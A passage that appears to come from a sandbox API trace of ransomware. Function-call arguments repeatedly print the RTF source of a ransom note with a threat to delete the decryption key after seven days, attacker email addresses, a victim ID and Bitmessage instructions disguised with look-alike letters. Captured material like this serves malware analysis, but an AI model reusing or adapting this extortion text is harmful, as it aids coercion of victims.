;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 